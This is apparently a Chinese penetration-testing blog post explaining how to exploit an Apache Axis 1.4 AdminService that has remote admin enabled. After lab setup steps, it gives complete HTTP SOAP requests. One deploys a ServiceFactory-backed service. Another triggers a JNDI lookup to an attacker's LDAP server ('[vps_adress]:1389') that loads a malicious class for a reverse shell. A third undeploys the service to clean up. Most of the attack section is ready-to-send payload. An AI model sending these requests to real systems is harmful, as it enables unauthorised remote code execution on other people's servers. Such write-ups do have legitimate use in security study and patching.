axis 1.4 AdminService未授权访问 jndi注入命令执行利用

日期: 2020-06-30 更新: 2020-06-30 分类: 渗透测试

最近利用一个漏洞Axis 1.4 adminservice开启远程访问下可新建服务执行任意方法, 写文件出现问题可试试本文利用默认包中的jndi lookup注入恶意class执行反弹shell

0x01 漏洞形成前提

Axis 1.4
AdminService enableRemoteAdmin == True

0x02 搭建

axis bin包解压后将webapps下axis复制到tomcat环境下的webapps目录下:
http://mirror.navercorp.com/apache/axis/axis/java/1.4/

1. 更新环境变量

执行本地构建命令时需要环境变量找到jar包路径

1
2
3
4
5
6
7
vim ~/.profile

export AXIS_HOME=/var/lib/tomcat8/webapps/axis
export AXIS_LIB=$AXIS_HOME/WEB-INF/lib
export AXISCLASSPATH=$AXIS_LIB/axis.jar:$AXIS_LIB/commons-discovery-0.2.jar:$AXIS_LIB/commons-logging-1.0.4.jar:$AXIS_LIB/jaxrpc.jar:$AXIS_LIB/saaj.jar:$AXIS_LIB/log4j-1.2.8.jar:$AXIS_LIB/xml-apis.jar:$AXIS_LIB/xercesImpl.jar:$AXIS_LIB/wsdl4j-1.5.1.jar

source ~/.profile

2.开启RemoteAdmin服务

1
2
3
4
5
6
7
8
9
10
webapps/axis/WEB-INF/deploy.wsdd

<deployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<service name="AdminService" provider="java:MSG">
<parameter name="className" value="org.apache.axis.utils.Admin"/>
<parameter name="allowedMethods" value="*"/>
<parameter name="enableRemoteAdmin" value="true"/>
</service>
</deployment>

3.部署刷新配置

1
java -cp $AXISCLASSPATH org.apache.axis.client.AdminClient deploy.wsdd

0x03 一处jndi调用可利用

1.所有默认可用的jar包:

发现org.apache.axis.client.ServiceFactory下getService服务中获取environment中的jndiName再进行context.lookup访问恶意ldap服务器:

0x04 利用过程

1.注册服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /axis/services/AdminService HTTP/1.1
Host: 192.168.123.136:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 737

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soapenv:Body>
<ns1:deployment xmlns:ns1="http://xml.apache.org/axis/wsdd/" xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<ns1:service name="test1Service" provider="java:RPC">
<ns1:parameter name="className" value="org.apache.axis.client.ServiceFactory"/>
<ns1:parameter name="allowedMethods" value="*"/>
</ns1:service>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>

2.调用jndi服务:

访问创建的test1Service进行jndi注入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
POST /axis/services/test1Service HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.123.136:8080/axis/servlet/AxisServlet
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-TW;q=0.9,zh-CN;q=0.8
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: 192.168.123.136:8080
Content-Length: 720

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:buil="http://build.antlr">
<soapenv:Header/>
<soapenv:Body>
<buil:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<environment xmlns:apachesoap="http://xml.apache.org/xml-soap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xsi:type="apachesoap:Map">
<item>
<key xsi:type="soapenc:string">jndiName</key>
<value xsi:type="soapenc:string">ldap://[vps_adress]:1389/Reverse1</value>
</item>
</environment>
</buil:getService>
</soapenv:Body>
</soapenv:Envelope>

3.marshalsec ldap 反弹shell:

4.卸载服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /axis/services/AdminService HTTP/1.1
Host: 192.168.123.136:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 463

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<undeployment xmlns="http://xml.apache.org/axis/wsdd/">
<service name="test1Service"/>
</undeployment>
</soapenv:Body>
</soapenv:Envelope>

0x05 参考链接

[https://axis.apache.org/axis/java/install.html](https://axis.apache.org/axis/java/install.html
https://github.com/KibodWapon/Axis-1.4-RCE-Poc